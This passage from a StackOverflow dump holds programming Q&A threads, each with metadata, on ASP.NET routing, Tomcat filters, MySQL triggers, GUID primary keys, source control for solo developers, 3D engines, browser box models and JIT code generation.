I'd recommend it, but I should mentioned I've not tried any other ones.
Good luck!
A: Also, check out ASP.NET MVC or if you're set on webforms, the new System.Web.Routing namespace in ASP.NET 3.5 SP1
A: I've developed an open source NuGet library for this problem which implicitly converts EveryMvc/Url to every-mvc/url.
Dashed urls are much more SEO friendly and easier to read. Lowercase URLs tend to create less problems. (More on my blog post)
NuGet Package: https://www.nuget.org/packages/LowercaseDashedRoute/
To install it, simply open the NuGet window in the Visual Studio by right clicking the Project and selecting NuGet Package Manager, and on the "Online" tab type "Lowercase Dashed Route", and it should pop up.
Alternatively, you can run this code in the Package Manager Console:
Install-Package LowercaseDashedRoute
After that you should open App_Start/RouteConfig.cs and comment out existing route.MapRoute(...) call and add this instead:
routes.Add(new LowercaseDashedRoute("{controller}/{action}/{id}",
new RouteValueDictionary(
new { controller = "Home", action = "Index", id = UrlParameter.Optional }),
new DashedRouteHandler()
)
);
That's it. All the urls are lowercase, dashed, and converted implicitly without you doing anything more.
Open Source Project Url: https://github.com/AtaS/lowercase-dashed-route
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45340",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Tomcat doFilter() invoked with committed response I have a Tomcat Filter that delegates requests to the a handling object depending on the URL. This is the only filter in the FilterChain. I have an Ajax app that hammers this filter with lots of requests.
Recently I noticed an issue where the filter's doFilter method is often called with a committed response as a parameter (Internally, it is the coyote response that is marked committed).
It seems to me that the only way that this can happen is if the recycle() method is not called on this coyote response. I have checked to make sure that I am not keeping references to any of the request, response, outputStream, or writer objects. Additionally, I made sure to close the outputStream in a finally block. However, this doesn't resolve this issue.
This sounds like I am doing something to abuse the servlet container but I am having trouble tracking it down.
A: I have tried using Tomcat 6.16 and 6.18. This is definitely is the only filter in the chain.
It seems that something is keeping a reference to the servlet outputStream. I wrapped the ServletOutputStream in my own OutputStream and then made sure the reference is destroyed. This fixed the issue so that I no longer see a committed response passed in.
This is an odd side effect of holding a reference. But I don't think it qualifies as a Tomcat bug. More likely a bug in ImageIO.createImageOutputStream() that I suspect is holding the reference.
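For illustration, a minimal sketch of that wrapper idea; class and method names are mine:
import java.io.IOException;
import java.io.OutputStream;

public class ReleasableOutputStream extends OutputStream {
    private OutputStream delegate;

    public ReleasableOutputStream(OutputStream delegate) {
        this.delegate = delegate;
    }

    @Override
    public void write(int b) throws IOException {
        if (delegate == null) {
            throw new IOException("Stream already released");
        }
        delegate.write(b);
    }

    // call from a finally block so any leaked reference can no
    // longer touch Tomcat's recycled response object
    public void release() {
        delegate = null;
    }
}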
A: What version of Tomcat are you using? To me this sounds like a bug in Tomcat, I can't think of any reason why your doFilter method should be called with a response that's already been committed (if that filter is the only one in the chain, are you sure about this?).
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45361",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Calculated columns in mysql on INSERT statements Let's say that I want to have a table that logs the date and the number of columns in some other table (or really any sort of math / string concat etc).
CREATE TABLE `log` (
`id` INTEGER NOT NULL AUTO_INCREMENT ,
`date` DATETIME NOT NULL ,
`count` INTEGER NOT NULL ,
PRIMARY KEY (`id`)
);
Is it possible to have the count column calculated for me whenever I do an insert?
e.g. do something like:
INSERT INTO log (date='foo');
and have count calculated by mysql.
Obviously I could do it myself by doing a query to get the count and inserting it, but this would be better.
A: Triggers are the best tool for annotating data when a table is changed by insert, update or delete.
To automatically set the date column of a new row in the log with the current date, you'd create a trigger that looked something like this:
DELIMITER //
create trigger log_date before insert on log
for each row begin
    set new.date = current_date();
end//
DELIMITER ;
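The count column can be filled in by the same kind of trigger -- a sketch, assuming the rows you want counted live in a table named foo (any other expression would work the same way):
DELIMITER //
CREATE TRIGGER log_fill BEFORE INSERT ON log
FOR EACH ROW
BEGIN
    SET NEW.date  = NOW();
    SET NEW.count = (SELECT COUNT(*) FROM foo);
END//
DELIMITER ;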
A: You definitely have to declare what to insert. This should be possible by using the INSERT ... SELECT statement.
INSERT INTO log (date, count)
SELECT NOW() as date, COUNT(id) as count
FROM foo;
Which should insert a new row into the log table, containing today's date and the number of rows in the foo table. (Assuming the foo table has an id column -- use the primary key or another indexed column.)
A: Why don't you use information_schema.TABLES?
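For example -- a sketch assuming the table being measured is foo in a schema named mydb; note that TABLE_ROWS is only an estimate for InnoDB tables:
INSERT INTO log (date, count)
SELECT NOW(), TABLE_ROWS
FROM information_schema.TABLES
WHERE TABLE_SCHEMA = 'mydb' AND TABLE_NAME = 'foo';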
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45372",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Good python library for generating audio files? Can anyone recommend a good library for generating an audio file, such as mp3, wav, or even midi, from python?
I've seen recommendations for working with the id tags (song name, artist, etc) in mp3 files, but this is not my goal.
A: See http://wiki.python.org/moin/Audio/ and http://wiki.python.org/moin/PythonInMusic, maybe some of the projects listed there can be of help.
Also, Google is your friend.
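If you only need to write raw samples to a WAV file, the wave module in the standard library is enough on its own. A minimal sketch that generates one second of a 440 Hz sine tone:
import math
import struct
import wave

framerate = 44100
samples = b"".join(
    struct.pack("<h", int(32767 * math.sin(2 * math.pi * 440 * i / framerate)))
    for i in range(framerate)  # one second of mono audio
)

with wave.open("tone.wav", "wb") as wav:
    wav.setnchannels(1)        # mono
    wav.setsampwidth(2)        # 16-bit signed samples
    wav.setframerate(framerate)
    wav.writeframes(samples)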
A: I've never used it, but check out ounk.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45385",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Accessible controls for ASP.NET In my last job we ended up rewriting the complete ASP.NET stack (forms, controls, validation, postback handling, ajax library etc...) - the reason I was given was that the ASP.NET controls were not accessible enough, not were any of the third party controls that were assessed for the project.
Can anyone point me to good accessible ASP.NET controls that do ajax as well?
Failing that, how would you approach creating accessible, ajax enabled controls?
A: You could take a look at the 'App_Browsers' feature in .NET.
It gives you the opportunity to hook into the rendering engine for each control. The original intention for this was to be able to alter the HTML output of controls depending on the user's browser - but you can also do it for all browsers.
You could also take a look at these control adapters, which make the normal ASP.NET controls 'CSS Friendly'.
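For example, the CSS Friendly adapters mentioned above are wired up with a .browser file under App_Browsers. A sketch of the registration -- the adapter type name here assumes the CSSFriendly assembly from that project is referenced:
<browsers>
  <browser refID="Default">
    <controlAdapters>
      <adapter controlType="System.Web.UI.WebControls.Menu"
               adapterType="CSSFriendly.MenuAdapter" />
    </controlAdapters>
  </browser>
</browsers>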
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45387",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: Advantages and disadvantages of GUID / UUID database keys I've worked on a number of database systems in the past where moving entries between databases would have been made a lot easier if all the database keys had been GUID / UUID values. I've considered going down this path a few times, but there's always a bit of uncertainty, especially around performance and un-read-out-over-the-phone-able URLs.
Has anyone worked extensively with GUIDs in a database? What advantages would I get by going that way, and what are the likely pitfalls?
A: One other small issue to consider with using GUIDs as primary keys if you are also using that column as a clustered index (a relatively common practice). You are going to take a hit on insert because GUIDs are not sequential in any way, so there will be page splits, etc. when you insert. Just something to consider if the system is going to have high IO...
A: primary-keys-ids-versus-guids
The Cost of GUIDs as Primary Keys (SQL Server 2000)
Myths, GUID vs. Autoincrement (MySQL 5)
This is really what you want.
UUID Pros
*
*Unique across every table, every database, every server
*Allows easy merging of records from different databases
*Allows easy distribution of databases across multiple servers
*You can generate IDs anywhere, instead of having to roundtrip to the database
*Most replication scenarios require GUID columns anyway
GUID Cons
*
*It is a whopping 4 times larger than the traditional 4-byte index value; this can have serious performance and storage implications if you're not careful
*Cumbersome to debug (where userid='{BAE7DF4-DDF-3RG-5TY3E3RF456AS10}')
*The generated GUIDs should be partially sequential for best performance (eg, newsequentialid() on SQL 2005) and to enable use of clustered indexes
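For instance, on SQL Server 2005 and later a sequential GUID key can be declared like this (table and columns hypothetical; NEWSEQUENTIALID() is only valid as a column default):
CREATE TABLE orders (
    id        uniqueidentifier NOT NULL DEFAULT NEWSEQUENTIALID(),
    placed_at datetime NOT NULL,
    CONSTRAINT pk_orders PRIMARY KEY CLUSTERED (id)
);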
A: There is one thing that is not really addressed, namely using random (UUIDv4) IDs as primary keys will harm the performance of the primary key index. It will happen whether or not your table is clustered around the key.
RDBMSs usually ensure the uniqueness of primary keys, and serve lookups by key, using a structure called a BTree, which is a search tree with a large branching factor (a binary search tree has a branching factor of 2). Now, a sequential integer ID would cause the inserts to occur on just one side of the tree, leaving most of the leaf nodes untouched. Adding random UUIDs will cause the insertions to split leaf nodes all over the index.
Likewise if the data stored is mostly temporal, it is often the case that the most recent data needs to be accessed and joined against the most. With random UUIDs the patterns will not benefit from this, and will hit more index rows, thereby needing more of the index pages in memory. With sequential IDs if the most-recent data is needed the most, the hot index pages would require less RAM.
A: Advantages:
*
*Can generate them offline.
*Makes replication trivial (as opposed to int's, which makes it REALLY hard)
*ORM's usually like them
*Unique across applications. So We can use the PK's from our CMS (guid) in our app (also guid) and know we are NEVER going to get a clash.
Disadvantages:
*
*Larger space use, but space is cheap(er)
*Can't order by ID to get the insert order.
*Can look ugly in a URL, but really, WTF are you doing putting a REAL DB key in a URL!? (This point disputed in comments below)
*Harder to do manual debugging, but not that hard.
Personally, I use them for most PK's in any system of a decent size, but I got "trained" on a system which was replicated all over the place, so we HAD to have them. YMMV.
I think the duplicate data thing is rubbish - you can get duplicate data however you do it. Surrogate keys are usually frowned upon where ever I've been working. We DO use the WordPress-like system though:
*
*unique ID for the row (GUID/whatever). Never visible to the user.
*public ID is generated ONCE from some field (e.g. the title - make it the-title-of-the-article)
UPDATE:
So this one gets +1'ed a lot, and I thought I should point out a big downside of GUID PK's: Clustered Indexes.
If you have a lot of records, and a clustered index on a GUID, your insert performance will SUCK, as you get inserts in random places in the list of items (that's the point), not at the end (which is quick).
So if you need insert performance, maybe use an auto-inc INT, and generate a GUID if you want to share it with someone else (e.g., showing it to a user in a URL).
A: Advantages:
*
*UUID values are unique across tables and databases. That's why rows can be merged between two databases, or data distributed across several databases.
*A UUID is safer to pass through a URL than integer data.
If you pass a UUID through a URL, attackers can't guess the next id. But if we pass an integer such as 10, then attackers can guess that the next id is 11, then 12, etc.
*UUIDs can be generated offline.
A: Why doesn't anyone mention performance? When you have multiple joins, all based on these nasty GUIDs the performance will go through the floor, been there :(
A: The main advantages are that you can create unique id's without connecting to the database. And id's are globally unique so you can easily combine data from different databases. These seem like small advantages but have saved me a lot of work in the past.
The main disadvantages are a bit more storage needed (not a problem on modern systems) and that the id's are not really human readable. This can be a problem when debugging.
There are some performance problems like index fragmentation. But those are easily solvable (COMB GUIDs by Jimmy Nilsson: http://www.informit.com/articles/article.aspx?p=25862 )
Edit merged my two answers to this question
@Matt Sheppard I think he means that you can duplicate rows with different GUIDs as primary keys. This is an issue with any kind of surrogate key, not just GUIDs. And like he said, it is easily solved by adding meaningful unique constraints to non-key columns. The alternative is to use a natural key, and those have real problems..
A: @Matt Sheppard:
Say you have a table of customers. Surely you don't want a customer to exist in the table more than once, or lots of confusion will happen throughout your sales and logistics departments (especially if the multiple rows about the customer contain different information).
So you have a customer identifier which uniquely identifies the customer and you make sure that the identifier is known by the customer (in invoices), so that the customer and the customer service people have a common reference in case they need to communicate. To guarantee no duplicated customer records, you add a uniqueness-constraint to the table, either through a primary key on the customer identifier or via a NOT NULL + UNIQUE constraint on the customer identifier column.
Next, for some reason (which I can't think of), you are asked to add a GUID column to the customer table and make that the primary key. If the customer identifier column is now left without a uniqueness-guarantee, you are asking for future trouble throughout the organization because the GUIDs will always be unique.
Some "architect" might tell you that "oh, but we handle the real customer uniqueness constraint in our app tier!". Right. Fashion regarding that general purpose programming languages and (especially) middle tier frameworks changes all the time, and will generally never out-live your database. And there is a very good chance that you will at some point need to access the database without going through the present application. == Trouble. (But fortunately, you and the "architect" are long gone, so you will not be there to clean up the mess.) In other words: Do maintain obvious constraints in the database (and in other tiers, as well, if you have the time).
In other words: There may be good reasons to add GUID columns to tables, but please don't fall for the temptation to make that lower your ambitions for consistency within the real (==non-GUID) information.
A: GUIDs may cause you a lot of trouble in the future if they are used as "uniquifiers", letting duplicated data get into your tables. If you want to use GUIDs, please consider still maintaining UNIQUE constraints on other column(s).
A: One thing not mentioned so far: UUIDs make it much harder to profile data
For web apps at least, it's common to access a resource with the id in the url, like stackoverflow.com/questions/45399. If the id is an integer, this both
*
*provides information about the number of questions (ie September 5th, 2008, the 45,399th question was asked)
*provides a leverage point to iterate through questions (what happens when I increment that by 1? I open the next asked question)
From the first point, I can combine the timestamp from the question and the number to profile how frequently questions are asked and how that changes over time. This matters less on a site like Stack Overflow, with publicly available information, but, depending on context, this may expose sensitive information.
For example, say I am a company that offers customers a permissions-gated portal. The address is portal.com/profile/{customerId}. If the id is an integer, you could profile the number of customers regardless of being able to see their information by querying for lastKnownCustomerCount + 1 regularly, and checking if the result is 404 - Not Found (customer does not exist) or 403 - Forbidden (customer does exist, but you do not have access to view).
UUIDs' non-sequential nature mitigates these issues. This isn't guaranteed to prevent profiling, but it's a start.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45399",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "267"
} |
Q: Source control system for single developer What's the recommended source control system for a very small team (one developer)?
Price does not matter. Customer would pay :-)
I'm working on Vista32 with VS 2008 in C++ and later in C# and with WPF. Setting up an extra (physical) server for this seems overkill to me. Any opinions?
A: I use Mercurial. It runs a treat running stand alone on my Vista development system with no other dependencies required. I use the command line but there's also TortoiseHG to integrate with Explorer.
Two comments:
*
*There are other tools which probably integrate with VS better. I think Subversion has nice VS plug ins.
*The benefit of a separate server is that it's a nice backup of all your work in case your HDD dies on you etc. so discount having one.
Edit: @Slartibartfast - if you just want to run source code control on a single machine, a distributed source control tool like Git or Mercurial is ideal, since they're designed to run complete repositories on a machine without the overhead of a server. The fact that you never connect your repository to anyone else's to push and pull changes doesn't mean the tool won't be right.
A: You can use Vault from SourceGear, the replacement tool for visual studio source safe.
The IDE is integrated in Visual Studio.
The tool is free for single user.
More information: http://www.sourcegear.com/vault/index.html
A: I would use Subversion (in fact I use it) [update: Jul 2014 -- I use Git -- see end of the answer].
SVN is:
*
*free,
*good enough (see disadvantages below),
*simple,
*works fine on Windows (and Linux too),
*a lot of people use it so it's easy to get help,
*can integrate with most of IDEs i.e. Visual Studio (i.e. ankhsvn or VisualSVN -- more info) or Eclipse (i.e. Subclipse -- here someone asked about that).
I would strongly recommend a separate machine for the source control server. At best somewhere in the cloud. Advantages:
*
*You don't lose your source control repositories if your development box dies.
*You don't have to worry about maintenance of one more box.
There are companies which host SVN repositories.
Here are links to SVN (client and server) packages for various operating systems.
Disadvantages of SVN
I am using SVN on Windows machine for about 5 years and found that SVN has a few disadvantages :).
It is slow on large repositories
SVN (or its client -- TortoiseSVN) has one big disadvantage -- it is terribly slow (while updating or committing) on large (thousands of files) repositories unless you have an SSD drive.
Merging can be difficult
Many people complain about how hard merging is with SVN.
I have been doing merges for about 4 years (including about 2 years in CVS -- that was terrible, but doable) and about 2 years with SVN.
And personally I don't find it hard -- on the other hand -- any merge is easy after merging branches in CVS :).
I do merge of large repository (two repositories in fact) once a week and rarely I have conflicts which are hard to solve (most of conflicts are solved automatically with diff software which I use).
However, in the case of a project with a few developers, merging should not be a problem at all if you keep to a few simple rules:
*
*merge changes often,
*avoid active development in various branches simultaneously.
Added in July 2011
Many devs recommended Distributed Version Control like Git or Mercurial.
From a single developer's perspective there are only a few important advantages of DVCS over SVN:
*
*DVCS can be faster.
*You can commit to local repository without access to central one.
*DVCS is a hot thing and fancy to use/learn (if someone pays for your learning).
And I don't think merging is a problem in case of single developer.
Joel Spolsky wrote a tutorial about Mercurial which is definitely worth reading.
So, despite the many advantages of DVCS, I would stay with SVN if merging or speed is not a problem.
Or try Mercurial, which according to this and this SO questions, is better supported (in July 2011) on Windows.
Added in July 2014
For about a year I use Git (Git Bash mainly) for my pet-projects (i.e. solving Euler problems) and local branches for each Euler problem are really nice feature -- exactly as it is described as advantage of DVCS.
Today Git tooling on Windows is much, much better than 2 or more years ago.
You can use a remote repo (like GitHub or ProjectLocker and many others) to keep a copy of your project away from your workstation with no extra effort/money.
However I use a GUI client only to look at diffs (and sometimes to choose files to commit), so it's better not to be afraid of the command line -- it's really nice.
So as of today I would go with Git.
A: I would also recommend Mercurial. Its command set is much like the one found in Subversion, so the learning curve is not that steep. As mentioned earlier, it's designed to run locally, but it's also easy to share/merge changes across computers, or even just push it to a remote server for backups.
It offers excellent tools, like TortoiseHG, and it has good plugins for NetBeans and Eclipse. It also runs natively on Win32, as it's written in Python.
If you don't want to set up a server yourself (for backups, e.g.), there are free hosting providers available; there's a comprehensive list on The Mercurial Wiki.
A: There are two possible solutions for your problem: centralized VCS or Distributed VCS (DVCS).
Centralized VCS like Subversion would satisfy your needs for committing and browsing the log. It also enables you to safely store your repository on another computer, which should be one of your major goals, as hard drive failure is always a possibility. However, with Subversion the history still resides only at the central location, making it vulnerable, and you stated that you do not want to have another server.
Distributed Version Control Systems (DVCS) such as Mercurial and Git enable you to do more complex operations on your repository. With both of those tools the whole repository resides on the same computer, making it a bit easier to make backups and to use the repository on another computer, e.g. a laptop. While Mercurial might seem complex at first, the operations you would use with Subversion are pretty much the same in Mercurial. Therefore there is no extra overhead to get started if you already know Subversion, and you can easily use the more advanced features of Mercurial later.
You should be able to find an online repository service for your Mercurial repository, enabling you to make easy backups and to collaborate some day if you have the need for it.
My recommendation is Mercurial with TortoiseHg.
A: A source control system doesn't care if there's only one developer involved :)
I would recommend that you use a source control system that you've used before and liked.
If you want VS 2008 integration with the source control system, however, I would go with TFS, although I never had the chance to set it up; it shouldn't be so hard.
Another possibility is to use SVN (you'll find some servers on Google) and TortoiseSVN, which integrates into the Windows shell and is nice to work with.
A: A number of the posts advocate putting the repository on a server because it provides redundancy. I don't think this is all that helpful for a single user. Using a separate server machine adds a lot of complexity, but it doesn't buy much redundancy: if you lose the server machine, you still have the current sources on your development machine, but you may have lost ALL your history. Putting the repository on a server does make sense if that server is being regularly backed up. Using an external hosting service for the repository can provide storage redundancy, but you're at the mercy of the external service AND you need an internet connection to access the repository. If you use an external host, make frequent backups of the repository that you keep control of!
I would personally recommend TortoiseSVN using a local file based repository. Just make sure you backup the local repository to a second machine or external media (such as CD-ROMs) on a regular basis.
A: I would definitely recommend git
Works great for both big and small teams. Only drawback is poor native windows support. Although it works fine for me in Cygwin. There also exists a native windows port.
Some of its benefits:
*
*Excellent support for a non-linear work flow. Its branching and merging is far better than eg Subversion.
*Good tools to navigate your repository
*Handles large projects well.
*It is not possible to modify the history without changing the cryptographic signature of your repository
*With its non monolithic design, it is easy to script.
Some people find that it has a steep learning curve. But once you understand it you can do almost anything you would want with it.
A: I'd recommend two things:
First up, that other server - what happens if your machine dies? the house burns down? etc. Having it on another machine is a good idea from a redundancy point of view.
The second one is WHAT:
If you are very familiar with visual source(un)safe, think about SourceGearVault. It's VERY nice, very fast, and very much a vastly improved "clone" of VSS (ie works the same way from the users POV, not under the hood). Needs SQL server and windows tho (it's .NET + SQL server). Free for 1 user.
If you are not, then I suggest you do one of two things:
First, get VisualSVN. It's great, works with VS2008 really well.
Second, if you MUST run it locally, get VisualSVN Server (free!). Make sure you have a good backup plan. Runs on XP/2003/2008/Vista etc. It's just Apache + SVN under the hood, so it just saves you on the setup - took me 5 mins to install and have it running.
OR, and I prefer this one:
go somewhere like Unfuddle, Dreamhost etc, and get hosting for SVN. It's private, it's fast, and most of all - it's OFFSITE. My Dreamhost account, with something crazy like 500GB of storage and 1-2TB of transfer/month, costs about $6/month! There are others which do SVN hosting + bug tracking etc. Look around.
But yeah - SVN is the schizzzznit. You could create a local repository, but I like having a remote, backed-up server.
TFS is total, utter overkill for 1 developer (or <5 IMO)
A: I realize that cost isn't a problem, but a nice free solution that wouldn't involve checking in and out would be to host the code within Dropbox. By doing this you'd instantly get versioning and backup, which are the main features that a single-developer system would provide.
A: Bazaar is a good version control system. I like to use it for my linux configs because you don't need to create a separate repo.
A: A while back I did a how-to blog post on using SVN with only one developer.
I called it Single serving source control
A: Go for subversion and tortoiseSVN, you don't need to set it up on a server.
*
*Costs are zero
*The subversion documentation is great and fun to read
*tortoiseSVN is a very convenient client
A: Subversion has very low barrier to entry.
TortoiseSVN is a free client, and integrates into your explorer- i.e. in right mouse click menu.
The repository can be just a directory somewhere on your PC or on a network drive. Backing up just means zipping up this directory
There are a few plugins to Visual Studio for Subversion; AnkhSVN is one I have used. It is free and integrates nicely (i.e. it will be smart about moving and deleting files etc.)
Subversion is a good choice for one developer.
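Creating and using a purely local repository takes two commands (paths hypothetical):
svnadmin create C:\Repositories\MyProject
svn checkout file:///C:/Repositories/MyProject C:\Dev\MyProject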
Update:
Since this post, I've been using Mercurial. It is a Distributed SVN. The 'distributed' aspect may not be directly useful to a sole developer, however it is better at merging and is somewhat faster. There is also a free and good Windows Explorer extension client - Tortoise Hg.
So in summary, if you are the sort of person who will work on many branches at once (doing spikes etc) or if you work on multiple PCs at once and would like full offline access to checkin history on both, then Mercurial. If you just want simple tracking and a well proven and easy to understand solution, then Subversion.
A: Sourcegear's Vault is a great option, it runs on SqlServer and it has been around for many years. I would not use any version of VSS (Visual Source Safe).
A: I'm surprised no one has mentioned Perforce. It's free for 2 people, blazingly fast, and integrates with VS. Also source server has bindings for it by default.
In addition to source control, it really is worthwhile to complete the loop and set up a symbol server and a source server, so that you have simple debugging of anything you've shipped (e.g. no more searching for PDBs or source that match the binary). Both source and symbol server are completely free and supported in VS since 2005.
A: Well, for a start, you don't need a distributed one :)
I'm not sure what this physical part means, because you could put an SVN server on your own machine with little trouble.
On the other hand, NetBeans has a local history module that logs all local changes of a file. Maybe something like that would be enough for you if Visual Studio has something similar.
A: I would recommend Subversion since it's for a single developer and I assume that you're not doing complex merging and lots of log/history checking.
Seems like many people are using http://svnrepository.com/ for their hosting. It comes with Trac and even Git if you need it later.
A: Some good answers here.
I want to re-iterate the suggestion to use a separate computer to host the source control server, although it doesn't have to be a dedicated machine. It could be your Windows Home Server box, or some other server you're already running. Or it could be a virtual machine hosted on some other server. Whatever, just make it separate from the machine(s) where you write code.
I also want to suggest that you get a good backup discipline for your server. Something nightly at least; hourly if you can. Back up to a dedicated device (like an external hard drive) or something offsite (a server in your cousin's house in another state) or in the cloud (Amazon S3). Remember that your source code is your key asset; take care of it!
A: I've been working with Bazaar now for a few weeks and really like it. I'm a Linux developer so I don't really know much about Tortoise, but if you like it you should know that there is a TortoiseBzr.
A: Hands down I would use git, and I believe many reasons why a single-developer would like to use git are hinted at or described in git magic
A: I use Springloops - version control tool for developers
*
*SVN / Git version control
*Automatic deployment to servers
*Create repositories
*Invite people
*Import files
*Great support
So, try Springloops
A: I don't see why the fact that you're one developer changes anything about the source control issue. I would follow the same system (in fact I do on my solo projects). I use wush.net (svn and trac) in those cases. It's fast to set up and doesn't require that you deal with or know about any server issues. I recommend you use something like this.
A: I would recommend using Subversion. Many have recommended using a separate box as a server, in case your dev machine dies. But what happens when the SVN server dies? The answer here is that no matter where you choose to run the server, ensure you always do frequent backups, possibly automated daily to some secondary, preferably offsite machine.
A: I use Perforce as well for my own personal stuff, mainly because we use it at work. There are emacs bindings for it as well, so you can sync, check stuff in or out, etc. all from within emacs.
A: I recently moved my studio from Subversion to Perforce and put some notes about it, sort of a postmortem, on my blog here. Hope it's useful.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45400",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "57"
} |
Q: Lightweight 3D Graphics Engine .NET (Compact and Full Framework) I am creating a GUI for a machine that runs remote (WinXP) or on the machine itself (Windows CE 6.0).
Right now I've created a fast visualisation (read: very simple) of the machine itself. The goal is to make a bit more complex visualisation of the machine and for that I would need a lightweight 3d engine.
The engine should run on both full and compact .net framework (I am prepared to do some porting :).
What I mean by lightweight is that it doesn't need shading, lighting, or advanced cameras. The idea is that the whole scene is shown in isometric perspective.
So what I was wondering is whether anyone knows a good engine (open source?) or has some helpful resources to share with me.
A: Did you try Irrlicht?
Recently Irrlicht has acquired official .NET bindings, allowing users to develop in .Net languages such as VB.NET, C# and Boo.
There is also Ogre 3D and also Axiom Engine
A: It is a good question. I have looked as well, and not seen anything. It would be great to see some easy to access great visual effects for mobile, to somewhat compete with other platforms that are getting better looking.
Sometimes with Windows Mobile I feel like I am in the Windows 3.1 days!
A: TrueEngine 3d sdk may also be of interest to you.
A: There is also SlimDX
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45401",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Is there any difference between the box models of IE8 and Firefox3? What are the main differences (if any) between the box models of IE8 and Firefox3?
Are they the same now?
What are the other main differences between these two browsers? Can a web developer assume that these two browsers are the same, since they (seem to) support the latest web standards?
A: I would never assume that any browser renders a page exactly the same... always test!
Even though they support standards, there are plenty of variations between different browsers and even different versions. FF1 renders differently to FF2 which renders differently to FF3.
You also have to remember that each browser has its own JavaScript engine which, again, will cause some scripts to work and others to fail.
You can of course reduce these differences by using CSS and JavaScript frameworks which have been developed to support multiple browsers.
However, you still must test in all browsers. There will always be something that doesn't quite look or behave right.
A: The Internet Explorer box model has been "fixed" since Internet Explorer 6, so long as your pages are in standards-compliant mode.
See: Quirks mode and Internet Explorer box model bug.
Until I learnt about doctype declarations, getting IE to work properly was a real PAIN, because IE runs in "quirks mode" by default. So having a standards-mode doctype will eliminate a whole bunch of the most painful CSS problems.
A: Things that will always differ between the two (and other browsers) are default values (font sizes in headings, for example). The way they achieve default visuals is often different, as well, such as whether or not they use padding or margin to achieve the indentation in bulleted lists.
Something quite positive that I just noticed is that IE8 finally fixes IE's handling of margin: 0 auto for block elements that you want horizontally centered in their respective parents.
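For example, given a standards-mode doctype, both browsers now center a fixed-width block the same way (selector hypothetical):
#content {
    width: 600px;   /* auto margins need an explicit width to center against */
    margin: 0 auto; /* equal left/right margins center the block */
}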
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45407",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: JIT code generation techniques How does a virtual machine generate native machine code on the fly and execute it?
Assuming you can figure out what are the native machine op-codes you want to emit, how do you go about actually running it?
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Or would you generate a temporary shared library (.dll or .so or whatever) and load it into memory using standard functions like LoadLibrary ?
A: You can just make the program counter point to the code you want to execute. Remember that what sits in memory can be either data or code. On x86 the program counter is the EIP register. The IP part of EIP stands for instruction pointer. The JMP instruction is called to jump to an address; after the jump, EIP will contain this address.
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Yes. This is one way of doing it. The resulting code would be cast to a pointer to function in C.
A:
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Yes, if you were doing it in C or C++ (or something similar), that's exactly what you'd do.
It appears hacky, but that's actually an artifact of the language design. Remember, the actual algorithm you want to use is very simple: determine what instructions you want to use, load them into a buffer in memory, and jump to the beginning of that buffer.
If you really try to do this, though, make sure you get the calling convention right when you return to your C program. I think if I wanted to generate code I'd look for a library to take care of that aspect for me. Nanojit's been in the news recently; you could look at that.
A: Yup. You just build up a char* and execute it. However, you need to note a couple of details. The char* must be in an executable section of memory and must have proper alignment.
In addition to nanojit you can also check out LLVM, which is another library that's capable of compiling various program representations down to a function pointer. Its interface is clean and the generated code tends to be efficient.
A: As far as I know it compiles everything in memory, because it has to run some heuristics to optimize the code (i.e. inlining over time), but you can have a look at the Shared Source Common Language Infrastructure 2.0 (Rotor) release. The whole codebase is identical to .NET except for the JITter and the GC.
A: As well as Rotor 2.0 - you could also take a look at the HotSpot virtual machine in the OpenJDK.
A: About generating a DLL: the additional required I/O for that, plus linking, plus the complexity of generating the DLL format, would make that much more complicated, and above all would kill performance; additionally, in the end you still call a function pointer to the loaded code, so...
Also, JIT compilation can happen one method at a time, and if you want to do that you'd generate lots of small DLLs.
About the "executable section" requirement, calling mprotect() on POSIX systems can fix the permissions (there's a similar API on Win32). You need to do that for a big memory segment instead that once per method since it'd be too slow otherwise.
On plain x86 you wouldn't notice the problem, on x86 with PAE or 64bit AMD64/Intel 64 bit machines you'd get a segfault.
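A sketch of the POSIX version of that: allocate a writable buffer, copy the opcodes in, flip it to executable with mprotect(), and call it. The hard-coded bytes are x86 opcodes for mov eax, 42 followed by ret:
#include <string.h>
#include <sys/mman.h>

typedef int (*jit_fn)(void);

int main(void) {
    unsigned char code[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 }; /* mov eax, 42 ; ret */

    void *buf = mmap(NULL, sizeof code, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return 1;

    memcpy(buf, code, sizeof code);                    /* emit the opcodes        */
    mprotect(buf, sizeof code, PROT_READ | PROT_EXEC); /* writable -> executable  */

    jit_fn f = (jit_fn)buf;
    return f(); /* process exits with code 42 */
}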
A:
Is it something as hacky as mapping
the mnemonic instructions to binary
codes, stuffing it into an char*
pointer and casting it as a function
and executing?
Yes, that works.
To do this in Windows you must set PAGE_EXECUTE_READWRITE on the allocated block:
void (*MyFunc)() = (void (*)()) VirtualAlloc(NULL, sizeofblock, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Now fill up the block with executable code, then call:
MyFunc();
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45408",
